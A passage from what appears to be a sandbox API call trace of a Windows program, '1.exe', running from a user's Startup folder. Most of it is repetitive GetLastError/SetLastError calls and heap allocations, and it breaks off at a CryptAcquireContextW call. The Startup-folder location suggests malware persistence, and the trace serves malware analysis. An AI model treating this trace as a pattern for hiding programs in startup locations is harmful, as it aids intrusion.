x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xaf\x3e\xc7\xa1\xe8\xfd\xd6", lpUsedDefaultChar=0x0) returned 256 [0129.145] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x115f728, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe")) returned 0x53 [0129.145] GetLastError () returned 0x0 [0129.145] SetLastError (dwErrCode=0x0) [0129.145] GetLastError () returned 0x0 [0129.145] SetLastError (dwErrCode=0x0) [0129.145] GetLastError () returned 0x0 [0129.145] SetLastError (dwErrCode=0x0) [0129.145] GetLastError () returned 0x0 [0129.145] SetLastError (dwErrCode=0x0) [0129.145] GetLastError () returned 0x0 [0129.145] SetLastError (dwErrCode=0x0) [0129.145] GetLastError () returned 0x0 [0129.145] SetLastError (dwErrCode=0x0) [0129.145] GetLastError () returned 0x0 [0129.145] SetLastError (dwErrCode=0x0) [0129.145] GetLastError () returned 0x0 [0129.145] SetLastError (dwErrCode=0x0) [0129.145] GetLastError () returned 0x0 [0129.145] SetLastError (dwErrCode=0x0) [0129.145] GetLastError () returned 0x0 [0129.145] SetLastError (dwErrCode=0x0) [0129.145] GetLastError () returned 0x0 [0129.146] SetLastError (dwErrCode=0x0) [0129.146] GetLastError () returned 0x0 [0129.146] SetLastError (dwErrCode=0x0) [0129.146] GetLastError () returned 0x0 [0129.146] SetLastError (dwErrCode=0x0) [0129.146] GetLastError () returned 0x0 [0129.146] SetLastError (dwErrCode=0x0) [0129.146] GetLastError () returned 0x0 [0129.146] SetLastError (dwErrCode=0x0) [0129.146] GetLastError () returned 0x0 [0129.146] SetLastError (dwErrCode=0x0) [0129.146] GetLastError () returned 0x0 [0129.146] SetLastError (dwErrCode=0x0) [0129.146] GetLastError () returned 0x0 [0129.146] SetLastError (dwErrCode=0x0) [0129.146] GetLastError () returned 0x0 [0129.146] SetLastError (dwErrCode=0x0) [0129.146] GetLastError () returned 0x0 [0129.146] SetLastError (dwErrCode=0x0) [0129.146] GetLastError () returned 0x0 [0129.146] SetLastError (dwErrCode=0x0) [0129.146] GetLastError () returned 0x0 [0129.146] SetLastError (dwErrCode=0x0) [0129.146] GetLastError () returned 0x0 [0129.146] SetLastError (dwErrCode=0x0) [0129.146] GetLastError () returned 0x0 [0129.147] SetLastError (dwErrCode=0x0) [0129.147] GetLastError () returned 0x0 [0129.147] SetLastError (dwErrCode=0x0) [0129.147] GetLastError () returned 0x0 [0129.147] SetLastError (dwErrCode=0x0) [0129.147] GetLastError () returned 0x0 [0129.147] SetLastError (dwErrCode=0x0) [0129.147] GetLastError () returned 0x0 [0129.147] SetLastError (dwErrCode=0x0) [0129.147] GetLastError () returned 0x0 [0129.147] SetLastError (dwErrCode=0x0) [0129.147] GetLastError () returned 0x0 [0129.147] SetLastError (dwErrCode=0x0) [0129.147] GetLastError () returned 0x0 [0129.147] SetLastError (dwErrCode=0x0) [0129.147] GetLastError () returned 0x0 [0129.147] SetLastError (dwErrCode=0x0) [0129.147] GetLastError () returned 0x0 [0129.147] SetLastError (dwErrCode=0x0) [0129.147] GetLastError () returned 0x0 [0129.147] SetLastError (dwErrCode=0x0) [0129.147] GetLastError () returned 0x0 [0129.147] SetLastError (dwErrCode=0x0) [0129.147] GetLastError () returned 0x0 [0129.147] SetLastError (dwErrCode=0x0) [0129.147] GetLastError () returned 0x0 [0129.147] SetLastError (dwErrCode=0x0) [0129.147] GetLastError () returned 0x0 [0129.148] SetLastError (dwErrCode=0x0) [0129.148] GetLastError () returned 0x0 [0129.148] SetLastError (dwErrCode=0x0) [0129.148] GetLastError () returned 0x0 [0129.148] SetLastError (dwErrCode=0x0) [0129.148] GetLastError () returned 0x0 [0129.148] SetLastError (dwErrCode=0x0) [0129.148] GetLastError () returned 0x0 [0129.148] SetLastError (dwErrCode=0x0) [0129.148] GetLastError () returned 0x0 [0129.148] SetLastError (dwErrCode=0x0) [0129.148] GetLastError () returned 0x0 [0129.148] SetLastError (dwErrCode=0x0) [0129.148] GetLastError () returned 0x0 [0129.148] SetLastError (dwErrCode=0x0) [0129.148] GetLastError () returned 0x0 [0129.148] SetLastError (dwErrCode=0x0) [0129.148] GetLastError () returned 0x0 [0129.148] SetLastError (dwErrCode=0x0) [0129.148] GetLastError () returned 0x0 [0129.148] SetLastError (dwErrCode=0x0) [0129.148] GetLastError () returned 0x0 [0129.148] SetLastError (dwErrCode=0x0) [0129.148] GetLastError () returned 0x0 [0129.148] SetLastError (dwErrCode=0x0) [0129.148] GetLastError () returned 0x0 [0129.148] SetLastError (dwErrCode=0x0) [0129.149] GetLastError () returned 0x0 [0129.149] SetLastError (dwErrCode=0x0) [0129.149] GetLastError () returned 0x0 [0129.149] SetLastError (dwErrCode=0x0) [0129.149] GetLastError () returned 0x0 [0129.149] SetLastError (dwErrCode=0x0) [0129.149] GetLastError () returned 0x0 [0129.149] SetLastError (dwErrCode=0x0) [0129.149] GetLastError () returned 0x0 [0129.149] SetLastError (dwErrCode=0x0) [0129.149] GetLastError () returned 0x0 [0129.149] SetLastError (dwErrCode=0x0) [0129.149] GetLastError () returned 0x0 [0129.149] SetLastError (dwErrCode=0x0) [0129.149] GetLastError () returned 0x0 [0129.149] SetLastError (dwErrCode=0x0) [0129.149] GetLastError () returned 0x0 [0129.149] SetLastError (dwErrCode=0x0) [0129.149] GetLastError () returned 0x0 [0129.149] SetLastError (dwErrCode=0x0) [0129.149] GetLastError () returned 0x0 [0129.149] SetLastError (dwErrCode=0x0) [0129.149] GetLastError () returned 0x0 [0129.149] SetLastError (dwErrCode=0x0) [0129.149] GetLastError () returned 0x0 [0129.149] SetLastError (dwErrCode=0x0) [0129.149] GetLastError () returned 0x0 [0129.150] SetLastError (dwErrCode=0x0) [0129.150] GetLastError () returned 0x0 [0129.150] SetLastError (dwErrCode=0x0) [0129.150] GetLastError () returned 0x0 [0129.150] SetLastError (dwErrCode=0x0) [0129.150] GetLastError () returned 0x0 [0129.150] SetLastError (dwErrCode=0x0) [0129.150] GetLastError () returned 0x0 [0129.150] SetLastError (dwErrCode=0x0) [0129.150] GetLastError () returned 0x0 [0129.150] SetLastError (dwErrCode=0x0) [0129.150] GetLastError () returned 0x0 [0129.150] SetLastError (dwErrCode=0x0) [0129.150] GetLastError () returned 0x0 [0129.150] SetLastError (dwErrCode=0x0) [0129.150] GetLastError () returned 0x0 [0129.150] SetLastError (dwErrCode=0x0) [0129.150] GetLastError () returned 0x0 [0129.150] SetLastError (dwErrCode=0x0) [0129.150] GetLastError () returned 0x0 [0129.150] SetLastError (dwErrCode=0x0) [0129.150] GetLastError () returned 0x0 [0129.150] SetLastError (dwErrCode=0x0) [0129.150] GetLastError () returned 0x0 [0129.150] SetLastError (dwErrCode=0x0) [0129.150] GetLastError () returned 0x0 [0129.150] SetLastError (dwErrCode=0x0) [0129.150] GetLastError () returned 0x0 [0129.151] SetLastError (dwErrCode=0x0) [0129.151] GetLastError () returned 0x0 [0129.151] SetLastError (dwErrCode=0x0) [0129.151] GetLastError () returned 0x0 [0129.151] SetLastError (dwErrCode=0x0) [0129.151] GetLastError () returned 0x0 [0129.151] SetLastError (dwErrCode=0x0) [0129.151] GetLastError () returned 0x0 [0129.151] SetLastError (dwErrCode=0x0) [0129.151] GetLastError () returned 0x0 [0129.151] SetLastError (dwErrCode=0x0) [0129.151] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x5c) returned 0x2cb1788 [0129.151] GetLastError () returned 0x0 [0129.151] SetLastError (dwErrCode=0x0) [0129.151] GetLastError () returned 0x0 [0129.151] SetLastError (dwErrCode=0x0) [0129.151] GetLastError () returned 0x0 [0129.151] SetLastError (dwErrCode=0x0) [0129.151] GetLastError () returned 0x0 [0129.151] SetLastError (dwErrCode=0x0) [0129.151] GetLastError () returned 0x0 [0129.151] SetLastError (dwErrCode=0x0) [0129.151] GetLastError () returned 0x0 [0129.151] SetLastError (dwErrCode=0x0) [0129.151] GetLastError () returned 0x0 [0129.151] SetLastError (dwErrCode=0x0) [0129.151] GetLastError () returned 0x0 [0129.152] SetLastError (dwErrCode=0x0) [0129.152] GetLastError () returned 0x0 [0129.152] SetLastError (dwErrCode=0x0) [0129.152] GetLastError () returned 0x0 [0129.152] SetLastError (dwErrCode=0x0) [0129.152] GetLastError () returned 0x0 [0129.152] SetLastError (dwErrCode=0x0) [0129.152] GetLastError () returned 0x0 [0129.152] SetLastError (dwErrCode=0x0) [0129.152] GetLastError () returned 0x0 [0129.152] SetLastError (dwErrCode=0x0) [0129.152] GetLastError () returned 0x0 [0129.152] SetLastError (dwErrCode=0x0) [0129.152] GetLastError () returned 0x0 [0129.152] SetLastError (dwErrCode=0x0) [0129.152] GetLastError () returned 0x0 [0129.152] SetLastError (dwErrCode=0x0) [0129.152] GetLastError () returned 0x0 [0129.152] SetLastError (dwErrCode=0x0) [0129.152] GetLastError () returned 0x0 [0129.152] SetLastError (dwErrCode=0x0) [0129.152] GetLastError () returned 0x0 [0129.152] SetLastError (dwErrCode=0x0) [0129.152] GetLastError () returned 0x0 [0129.152] SetLastError (dwErrCode=0x0) [0129.152] GetLastError () returned 0x0 [0129.152] SetLastError (dwErrCode=0x0) [0129.152] GetLastError () returned 0x0 [0129.153] SetLastError (dwErrCode=0x0) [0129.153] GetLastError () returned 0x0 [0129.153] SetLastError (dwErrCode=0x0) [0129.153] GetLastError () returned 0x0 [0129.153] SetLastError (dwErrCode=0x0) [0129.153] GetLastError () returned 0x0 [0129.153] SetLastError (dwErrCode=0x0) [0129.153] GetLastError () returned 0x0 [0129.153] SetLastError (dwErrCode=0x0) [0129.153] GetLastError () returned 0x0 [0129.153] SetLastError (dwErrCode=0x0) [0129.153] GetLastError () returned 0x0 [0129.153] SetLastError (dwErrCode=0x0) [0129.153] GetLastError () returned 0x0 [0129.153] SetLastError (dwErrCode=0x0) [0129.153] GetLastError () returned 0x0 [0129.153] SetLastError (dwErrCode=0x0) [0129.153] GetLastError () returned 0x0 [0129.153] SetLastError (dwErrCode=0x0) [0129.153] GetLastError () returned 0x0 [0129.153] SetLastError (dwErrCode=0x0) [0129.153] GetLastError () returned 0x0 [0129.153] SetLastError (dwErrCode=0x0) [0129.153] GetLastError () returned 0x0 [0129.153] SetLastError (dwErrCode=0x0) [0129.153] GetLastError () returned 0x0 [0129.153] SetLastError (dwErrCode=0x0) [0129.153] GetLastError () returned 0x0 [0129.154] SetLastError (dwErrCode=0x0) [0129.154] GetLastError () returned 0x0 [0129.154] SetLastError (dwErrCode=0x0) [0129.154] GetLastError () returned 0x0 [0129.154] SetLastError (dwErrCode=0x0) [0129.154] GetLastError () returned 0x0 [0129.154] SetLastError (dwErrCode=0x0) [0129.154] GetLastError () returned 0x0 [0129.154] SetLastError (dwErrCode=0x0) [0129.154] GetLastError () returned 0x0 [0129.154] SetLastError (dwErrCode=0x0) [0129.154] GetLastError () returned 0x0 [0129.154] SetLastError (dwErrCode=0x0) [0129.154] GetLastError () returned 0x0 [0129.154] SetLastError (dwErrCode=0x0) [0129.154] GetLastError () returned 0x0 [0129.154] SetLastError (dwErrCode=0x0) [0129.154] GetLastError () returned 0x0 [0129.154] SetLastError (dwErrCode=0x0) [0129.154] GetLastError () returned 0x0 [0129.154] SetLastError (dwErrCode=0x0) [0129.154] GetLastError () returned 0x0 [0129.154] SetLastError (dwErrCode=0x0) [0129.154] GetLastError () returned 0x0 [0129.154] SetLastError (dwErrCode=0x0) [0129.154] GetLastError () returned 0x0 [0129.154] SetLastError (dwErrCode=0x0) [0129.154] GetLastError () returned 0x0 [0129.155] SetLastError (dwErrCode=0x0) [0129.155] GetLastError () returned 0x0 [0129.155] SetLastError (dwErrCode=0x0) [0129.155] GetLastError () returned 0x0 [0129.155] SetLastError (dwErrCode=0x0) [0129.155] GetLastError () returned 0x0 [0129.155] SetLastError (dwErrCode=0x0) [0129.155] GetLastError () returned 0x0 [0129.155] SetLastError (dwErrCode=0x0) [0129.155] GetLastError () returned 0x0 [0129.155] SetLastError (dwErrCode=0x0) [0129.155] GetLastError () returned 0x0 [0129.155] SetLastError (dwErrCode=0x0) [0129.155] GetLastError () returned 0x0 [0129.155] SetLastError (dwErrCode=0x0) [0129.155] GetLastError () returned 0x0 [0129.155] SetLastError (dwErrCode=0x0) [0129.155] GetLastError () returned 0x0 [0129.155] SetLastError (dwErrCode=0x0) [0129.155] GetLastError () returned 0x0 [0129.155] SetLastError (dwErrCode=0x0) [0129.155] GetLastError () returned 0x0 [0129.155] SetLastError (dwErrCode=0x0) [0129.155] GetLastError () returned 0x0 [0129.155] SetLastError (dwErrCode=0x0) [0129.155] GetLastError () returned 0x0 [0129.155] SetLastError (dwErrCode=0x0) [0129.155] GetLastError () returned 0x0 [0129.156] SetLastError (dwErrCode=0x0) [0129.156] GetLastError () returned 0x0 [0129.156] SetLastError (dwErrCode=0x0) [0129.156] GetLastError () returned 0x0 [0129.156] SetLastError (dwErrCode=0x0) [0129.156] GetLastError () returned 0x0 [0129.156] SetLastError (dwErrCode=0x0) [0129.156] GetLastError () returned 0x0 [0129.156] SetLastError (dwErrCode=0x0) [0129.156] GetLastError () returned 0x0 [0129.156] SetLastError (dwErrCode=0x0) [0129.156] GetLastError () returned 0x0 [0129.156] SetLastError (dwErrCode=0x0) [0129.156] GetLastError () returned 0x0 [0129.156] SetLastError (dwErrCode=0x0) [0129.156] GetLastError () returned 0x0 [0129.156] SetLastError (dwErrCode=0x0) [0129.156] GetLastError () returned 0x0 [0129.156] SetLastError (dwErrCode=0x0) [0129.156] GetLastError () returned 0x0 [0129.156] SetLastError (dwErrCode=0x0) [0129.156] GetLastError () returned 0x0 [0129.156] SetLastError (dwErrCode=0x0) [0129.156] GetLastError () returned 0x0 [0129.156] SetLastError (dwErrCode=0x0) [0129.156] GetLastError () returned 0x0 [0129.157] SetLastError (dwErrCode=0x0) [0129.157] GetLastError () returned 0x0 [0129.157] SetLastError (dwErrCode=0x0) [0129.157] GetLastError () returned 0x0 [0129.157] SetLastError (dwErrCode=0x0) [0129.157] GetLastError () returned 0x0 [0129.157] SetLastError (dwErrCode=0x0) [0129.157] GetLastError () returned 0x0 [0129.157] SetLastError (dwErrCode=0x0) [0129.157] GetLastError () returned 0x0 [0129.157] SetLastError (dwErrCode=0x0) [0129.157] GetLastError () returned 0x0 [0129.157] SetLastError (dwErrCode=0x0) [0129.157] GetLastError () returned 0x0 [0129.157] SetLastError (dwErrCode=0x0) [0129.157] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x98) returned 0x2cb17f0 [0129.157] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1f) returned 0x2cb1890 [0129.157] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x28) returned 0x2cb18b8 [0129.157] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x37) returned 0x2cb18e8 [0129.157] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x3c) returned 0x2cb1928 [0129.157] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x31) returned 0x2cb1970 [0129.157] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x14) returned 0x2cb19b0 [0129.157] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x24) returned 0x2cb19d0 [0129.157] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0xd) returned 0x2cb1a00 [0129.157] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x17) returned 0x2cb1a18 [0129.157] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x2b) returned 0x2cb1a38 [0129.157] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x15) returned 0x2cb1a70 [0129.157] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x17) returned 0x2cb1a90 [0129.157] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x22) returned 0x2cb1ab0 [0129.157] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0xe) returned 0x2cb1ae0 [0129.157] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0xc2) returned 0x2cb1af8 [0129.157] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x3e) returned 0x2cb1bc8 [0129.157] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1b) returned 0x2cb1c10 [0129.157] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1d) returned 0x2cb1c38 [0129.157] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x48) returned 0x2cb1c60 [0129.158] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x12) returned 0x2cb1cb0 [0129.158] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x18) returned 0x2cb1cd0 [0129.158] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1b) returned 0x2cb1cf0 [0129.158] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x24) returned 0x2cb1d18 [0129.158] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x29) returned 0x2cb1d48 [0129.158] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cb1d80 [0129.158] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x6b) returned 0x2cb1da8 [0129.158] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x17) returned 0x2cb1e20 [0129.158] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x14) returned 0x2cb1e40 [0129.158] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0xf) returned 0x2cb1e60 [0129.158] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x16) returned 0x2cb1e78 [0129.158] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x28) returned 0x2cb1e98 [0129.158] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x27) returned 0x2cb1ec8 [0129.158] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x12) returned 0x2cb1ef8 [0129.158] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x21) returned 0x2cb1f18 [0129.158] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x10) returned 0x2cb1f48 [0129.158] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1c) returned 0x2cb1f60 [0129.158] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x12) returned 0x2cb1f88 [0129.158] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb0fd0 | out: hHeap=0x2cb0000) returned 1 [0129.158] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0129.158] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x80) returned 0x2cb0fd0 [0129.158] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x11581f6) returned 0x0 [0129.159] RtlSizeHeap (HeapHandle=0x2cb0000, Flags=0x0, MemoryPointer=0x2cb0fd0) returned 0x80 [0129.159] GetLastError () returned 0x0 [0129.159] SetLastError (dwErrCode=0x0) [0129.159] GetLastError () returned 0x0 [0129.159] SetLastError (dwErrCode=0x0) [0129.159] GetLastError () returned 0x0 [0129.159] SetLastError (dwErrCode=0x0) [0129.159] GetLastError () returned 0x0 [0129.159] SetLastError (dwErrCode=0x0) [0129.159] GetLastError () returned 0x0 [0129.159] SetLastError (dwErrCode=0x0) [0129.159] GetLastError () returned 0x0 [0129.159] SetLastError (dwErrCode=0x0) [0129.159] GetLastError () returned 0x0 [0129.159] SetLastError (dwErrCode=0x0) [0129.159] GetLastError () returned 0x0 [0129.159] SetLastError (dwErrCode=0x0) [0129.159] GetLastError () returned 0x0 [0129.159] SetLastError (dwErrCode=0x0) [0129.159] GetLastError () returned 0x0 [0129.159] SetLastError (dwErrCode=0x0) [0129.159] GetLastError () returned 0x0 [0129.159] SetLastError (dwErrCode=0x0) [0129.160] GetLastError () returned 0x0 [0129.160] SetLastError (dwErrCode=0x0) [0129.160] GetLastError () returned 0x0 [0129.160] SetLastError (dwErrCode=0x0) [0129.160] GetLastError () returned 0x0 [0129.160] SetLastError (dwErrCode=0x0) [0129.160] GetLastError () returned 0x0 [0129.160] SetLastError (dwErrCode=0x0) [0129.160] GetLastError () returned 0x0 [0129.160] SetLastError (dwErrCode=0x0) [0129.160] GetLastError () returned 0x0 [0129.160] SetLastError (dwErrCode=0x0) [0129.160] GetLastError () returned 0x0 [0129.160] SetLastError (dwErrCode=0x0) [0129.160] GetLastError () returned 0x0 [0129.160] SetLastError (dwErrCode=0x0) [0129.160] GetLastError () returned 0x0 [0129.160] SetLastError (dwErrCode=0x0) [0129.160] GetLastError () returned 0x0 [0129.160] SetLastError (dwErrCode=0x0) [0129.160] GetLastError () returned 0x0 [0129.160] SetLastError (dwErrCode=0x0) [0129.160] GetLastError () returned 0x0 [0129.160] SetLastError (dwErrCode=0x0) [0129.160] GetLastError () returned 0x0 [0129.160] SetLastError (dwErrCode=0x0) [0129.160] GetLastError () returned 0x0 [0129.161] SetLastError (dwErrCode=0x0) [0129.161] GetLastError () returned 0x0 [0129.161] SetLastError (dwErrCode=0x0) [0129.161] GetLastError () returned 0x0 [0129.161] SetLastError (dwErrCode=0x0) [0129.161] GetLastError () returned 0x0 [0129.161] SetLastError (dwErrCode=0x0) [0129.161] GetLastError () returned 0x0 [0129.161] SetLastError (dwErrCode=0x0) [0129.161] GetLastError () returned 0x0 [0129.161] SetLastError (dwErrCode=0x0) [0129.161] GetLastError () returned 0x0 [0129.161] SetLastError (dwErrCode=0x0) [0129.161] GetLastError () returned 0x0 [0129.161] SetLastError (dwErrCode=0x0) [0129.161] GetLastError () returned 0x0 [0129.161] SetLastError (dwErrCode=0x0) [0129.161] GetLastError () returned 0x0 [0129.161] SetLastError (dwErrCode=0x0) [0129.161] GetLastError () returned 0x0 [0129.161] SetLastError (dwErrCode=0x0) [0129.161] GetLastError () returned 0x0 [0129.161] SetLastError (dwErrCode=0x0) [0129.161] GetLastError () returned 0x0 [0129.161] SetLastError (dwErrCode=0x0) [0129.161] GetLastError () returned 0x0 [0129.161] SetLastError (dwErrCode=0x0) [0129.161] GetLastError () returned 0x0 [0129.162] SetLastError (dwErrCode=0x0) [0129.162] GetLastError () returned 0x0 [0129.162] SetLastError (dwErrCode=0x0) [0129.162] GetLastError () returned 0x0 [0129.162] SetLastError (dwErrCode=0x0) [0129.162] GetLastError () returned 0x0 [0129.162] SetLastError (dwErrCode=0x0) [0129.162] GetLastError () returned 0x0 [0129.162] SetLastError (dwErrCode=0x0) [0129.162] GetLastError () returned 0x0 [0129.162] SetLastError (dwErrCode=0x0) [0129.162] GetLastError () returned 0x0 [0129.162] SetLastError (dwErrCode=0x0) [0129.162] GetLastError () returned 0x0 [0129.162] SetLastError (dwErrCode=0x0) [0129.162] GetLastError () returned 0x0 [0129.162] SetLastError (dwErrCode=0x0) [0129.162] GetLastError () returned 0x0 [0129.162] SetLastError (dwErrCode=0x0) [0129.162] GetLastError () returned 0x0 [0129.162] SetLastError (dwErrCode=0x0) [0129.162] GetLastError () returned 0x0 [0129.162] SetLastError (dwErrCode=0x0) [0129.162] GetLastError () returned 0x0 [0129.162] SetLastError (dwErrCode=0x0) [0129.162] GetLastError () returned 0x0 [0129.162] SetLastError (dwErrCode=0x0) [0129.162] GetLastError () returned 0x0 [0129.163] SetLastError (dwErrCode=0x0) [0129.163] GetLastError () returned 0x0 [0129.163] SetLastError (dwErrCode=0x0) [0129.163] GetLastError () returned 0x0 [0129.163] SetLastError (dwErrCode=0x0) [0129.163] GetLastError () returned 0x0 [0129.163] SetLastError (dwErrCode=0x0) [0129.163] GetLastError () returned 0x0 [0129.163] SetLastError (dwErrCode=0x0) [0129.163] GetLastError () returned 0x0 [0129.163] SetLastError (dwErrCode=0x0) [0129.163] GetLastError () returned 0x0 [0129.163] SetLastError (dwErrCode=0x0) [0129.163] GetLastError () returned 0x0 [0129.163] SetLastError (dwErrCode=0x0) [0129.163] GetLastError () returned 0x0 [0129.163] SetLastError (dwErrCode=0x0) [0129.163] GetLastError () returned 0x0 [0129.163] SetLastError (dwErrCode=0x0) [0129.163] GetLastError () returned 0x0 [0129.163] SetLastError (dwErrCode=0x0) [0129.163] GetLastError () returned 0x0 [0129.163] SetLastError (dwErrCode=0x0) [0129.163] GetLastError () returned 0x0 [0129.163] SetLastError (dwErrCode=0x0) [0129.163] GetLastError () returned 0x0 [0129.163] SetLastError (dwErrCode=0x0) [0129.164] GetLastError () returned 0x0 [0129.164] SetLastError (dwErrCode=0x0) [0129.164] GetLastError () returned 0x0 [0129.164] SetLastError (dwErrCode=0x0) [0129.164] GetLastError () returned 0x0 [0129.164] SetLastError (dwErrCode=0x0) [0129.164] GetLastError () returned 0x0 [0129.164] SetLastError (dwErrCode=0x0) [0129.164] GetLastError () returned 0x0 [0129.164] SetLastError (dwErrCode=0x0) [0129.164] GetLastError () returned 0x0 [0129.164] SetLastError (dwErrCode=0x0) [0129.164] GetLastError () returned 0x0 [0129.164] SetLastError (dwErrCode=0x0) [0129.164] GetLastError () returned 0x0 [0129.164] SetLastError (dwErrCode=0x0) [0129.164] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x30) returned 0x2cb1fa8 [0129.164] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x2420) returned 0x2cb1fe8 [0129.164] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x174) returned 0x2cb1058 [0129.165] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x2cb11d8 [0129.165] CryptAcquireContextW (in: phProv=0x115fcf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: 